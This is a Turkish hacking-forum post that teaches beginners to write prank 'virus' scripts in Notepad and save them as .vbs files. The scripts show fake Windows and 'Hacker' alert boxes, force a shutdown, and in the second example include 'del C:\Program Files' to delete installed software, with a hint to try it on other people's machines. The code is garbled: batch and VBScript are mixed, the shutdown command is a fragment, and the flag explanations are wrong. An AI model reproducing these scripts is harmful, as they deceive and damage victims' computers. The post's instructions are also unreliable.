Cmd İle kod yazma # part 1

EmreKaan2

Yeni üye
16 May 2021
22
9
Cmd ile kod nasıl yazılır ?

sol allta windows simgesi var ona basın.

not defteri açın.

1. kod

@echo off
echo virus bilgisayari ele gecirdi !


Kod:
text1 = MsgBox("Bilgisayariniz az sonra kapatilacaktir" , vbcritical, "Windows")
text1 = MsgBox("hahaha ele gecirdim pc'ni" , vbcritical, "Hacker")
 -s = shutdown, -t 12

Eğer "-s" kısmını "-f" yaparsanız o saniye sonra program kapanır  "-f" yapmak yerine "ping localhost -n 12 > null" yazarak'da program kapatma kodunu kullanabiliriz. veya "-s" koyarsanız o saniyede pc kapanır.

2. kod (sakın kendi pc'nize denemeyin suçu bize atmayınız)

text1 = MsgBox("Error 'noncode' " , vbcritical, "Windows")

del C:\Program Files

'noncode' yazan kısıma 'hatakodu' yaptığım gibi değil bir hata kodu girin ve ' ' kısımını silin ve boyle olucak hatakodu Benim gibi olmasın :D

Bir kodu seçtiken sonra kaydedin ve deneme.txt ama deneme olmuyucak sizde yani onu boşuna yazmayınız .txt kısmını .vbs yapın ve 1. Kodu açın ama 2. kodu kendinizde denemyin.



Buradan moderatörlere selam OLSUN!
 
Moderatör tarafında düzenlendi:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.